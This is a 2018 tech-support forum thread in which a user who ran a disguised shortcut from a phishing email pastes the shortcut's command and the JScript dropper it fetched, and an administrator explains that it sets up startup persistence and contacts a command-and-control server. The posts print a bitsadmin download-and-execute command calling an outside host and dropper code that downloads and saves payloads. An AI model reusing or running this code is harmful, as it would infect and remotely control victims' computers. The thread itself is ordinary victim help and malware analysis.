Jump to content


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.

Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.


Please look at code I accidentally ran from email.

  • Please log in to reply
3 replies to this topic

#1 natastna2


  • Members
  • 3 posts
  • Local time:10:04 PM

Posted 01 February 2018 - 10:34 AM

I received an email 20 minutes ago saying there was a problem on a website I run, it linked to an img download site. I downloaded the image, ran it and then noticed it was just named .jpg but was actually a shortcut. (Idiotic!).
The shortcut was:
C:\Windows\System32\cmd.exe /c mkdir c:\x1\ & cmd.exe /c attrib +h +s c:\x1 & cmd.exe /c "bitsadmin /transfer myjob /download /priority FOREGROUND www.dasc.ist/welcome.js c:\x1\1ax.js & start wscript.exe c:\x1\1ax.js"
and then contents of 1ax.js was:
sName = "win32";
var JpgName = "30012018";
var Server = "dasc.ist/file/file.php?file=
var YeniOlustur = WScript.CreateObject("WScript.Shell");
AppFolder = YeniOlustur.SpecialFolders("AppData");
InstallFolder = AppFolder+"\\Microsoft\\Windows\\Templates";
StartupFolder = YeniOlustur.SpecialFolders("Startup");
WindowsFolder = YeniOlustur.SpecialFolders("windir");
SystemFolder = WindowsFolder+"\\System32";
function Connect(islem,dosyadi)
var checkbeni = new ActiveXObject("MSXML2.XMLHTTP.3.0");
checkbeni["open"]("GET", Server+islem, false);
checkbeni.setRequestHeader("UserAgent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
var Cevap = checkbeni["responsetext"];
    var xmlObj = WScript.CreateObject("MSXml2.DOMDocument");
    var docElement = xmlObj.createElement("Base64Data");
    docElement.dataType = "bin.base64";
    docElement.text = Cevap;
    var outputStream = WScript.CreateObject("ADODB.Stream");
    outputStream.Type = 1;
    outputStream.SaveToFile(InstallFolder + "\\"+dosyadi, 2);
catch(AHA) {  WScript.sleep(1500); Connect(islem,dosyadi); }
function Install()
myObject = new ActiveXObject("Scripting.FileSystemObject");
if(!myObject.FileExists(InstallFolder + "\\"+JsName+".js")) {
YeniOlustur["run"](InstallFolder+"\\"+ScName+".lnk", 1);
if(!myObject.FileExists(InstallFolder + "\\"+JpgName+".jpg")) {
Connect(JpgName,JpgName+".jpg"); }
YeniOlustur["run"](InstallFolder+"\\"+JpgName+".jpg", 1);
function Short(adresv)
{ try{
var Kisayolcu = YeniOlustur.CreateShortcut(adresv + "\\"+ScName+".lnk");
var adresim = "wscript.exe";
Kisayolcu.TargetPath = adresim;
Kisayolcu.Arguments = InstallFolder+"\\"+JsName+".js";
Kisayolcu.WorkingDirectory = InstallFolder;
} catch(YOKYA){   WScript.sleep(1500);  Short(); } }
I would very much appreciate anyone who could tell me what this might have done. It was not picked up by my antivirus and I am running malwarebytes / tdss scans currently.
Thank you very much for any help / advice.

BC AdBot (Login to Remove)


#2 Grinler


    Lawrence Abrams

  • Admin
  • 43,640 posts
  • Gender:Male
  • Location:USA
  • Local time:11:04 PM

Posted 01 February 2018 - 04:02 PM

This script downloads some other javascript files and an image and sets it up like this:

%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

On login, svchost.lnk will launch win32.js, which connects to a Command & Control server that will send commands to execute.

#3 Grinler


    Lawrence Abrams

  • Admin
  • 43,640 posts
  • Gender:Male
  • Location:USA
  • Local time:11:04 PM

Posted 01 February 2018 - 05:23 PM

Btw, could you submit the email to https://www.bleepingcomputer.com/submit-malware.php?channel=3

Would like to do a quick story on it to alert our visitors/

#4 natastna2

  • Topic Starter

  • Members
  • 3 posts
  • Local time:10:04 PM

Posted 02 February 2018 - 06:40 PM

Thank you very much for your help and time in responding to me. I really appreciate it.


I decided to just reformat to be on the safe side.


I'll submit that email now.


Kind regards,


0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users